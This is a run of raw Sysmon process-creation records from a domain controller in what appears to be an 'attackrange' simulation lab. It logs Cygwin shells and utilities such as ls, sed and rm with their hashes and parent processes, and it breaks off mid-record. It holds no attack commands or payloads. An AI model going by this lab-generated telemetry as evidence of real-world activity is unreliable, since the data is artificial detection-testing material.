14:56:03.026{A8622C2F-5403-6078-650C-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057763Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.018{A8622C2F-5403-6078-640C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5403-6078-630C-00000000AE01}4056C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057753Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.009{A8622C2F-5403-6078-630C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057741Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.001{A8622C2F-5403-6078-620C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-610C-00000000AE01}6448C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057731Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.993{A8622C2F-5402-6078-610C-00000000AE01}6448C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057721Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.985{A8622C2F-5402-6078-600C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-5F0C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057711Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.977{A8622C2F-5402-6078-5F0C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057701Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.968{A8622C2F-5402-6078-5E0C-00000000AE01}6552C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-5D0C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.960{A8622C2F-5402-6078-5D0C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-5C0C-00000000AE01}5776C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.952{A8622C2F-5402-6078-5C0C-00000000AE01}5776C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.943{A8622C2F-5402-6078-5B0C-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-5A0C-00000000AE01}4412C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.935{A8622C2F-5402-6078-5A0C-00000000AE01}4412C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.926{A8622C2F-5402-6078-590C-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.918{A8622C2F-5402-6078-580C-00000000AE01}5832C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057625Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.910{A8622C2F-5402-6078-570C-00000000AE01}4696C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-560C-00000000AE01}1408C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.901{A8622C2F-5402-6078-560C-00000000AE01}1408C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.893{A8622C2F-5402-6078-550C-00000000AE01}6240C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.885{A8622C2F-5402-6078-540C-00000000AE01}1100C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.877{A8622C2F-5402-6078-530C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-520C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057571Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.869{A8622C2F-5402-6078-520C-00000000AE01}6076C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.860{A8622C2F-5402-6078-510C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-500C-00000000AE01}5904C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.852{A8622C2F-5402-6078-500C-00000000AE01}5904C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057539Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.845{A8622C2F-5402-6078-4F0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-4E0C-00000000AE01}924C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057529Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.837{A8622C2F-5402-6078-4E0C-00000000AE01}924C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057519Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.828{A8622C2F-5402-6078-4D0C-00000000AE01}6432C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-4C0C-00000000AE01}5800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.820{A8622C2F-5402-6078-4C0C-00000000AE01}5800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-4B0C-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.812{A8622C2F-5402-6078-4B0C-00000000AE01}6552C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.803{A8622C2F-5402-6078-4A0C-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-490C-00000000AE01}5184C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.795{A8622C2F-5402-6078-490C-00000000AE01}5184C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.787{A8622C2F-5402-6078-480C-00000000AE01}5096C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.779{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.770{A8622C2F-5402-6078-460C-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-450C-00000000AE01}6416C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.762{A8622C2F-5402-6078-450C-00000000AE01}6416C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.754{A8622C2F-5402-6078-440C-00000000AE01}2664C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057411Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.746{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.738{A8622C2F-5402-6078-420C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-410C-00000000AE01}6364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057389Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.730{A8622C2F-5402-6078-410C-00000000AE01}6364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.721{A8622C2F-5402-6078-400C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-3F0C-00000000AE01}5864C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.713{A8622C2F-5402-6078-3F0C-00000000AE01}5864C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.706{A8622C2F-5402-6078-3E0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-3D0C-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.698{A8622C2F-5402-6078-3D0C-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.689{A8622C2F-5402-6078-3C0C-00000000AE01}3176C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-3B0C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.681{A8622C2F-5402-6078-3B0C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-3A0C-00000000AE01}6432C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 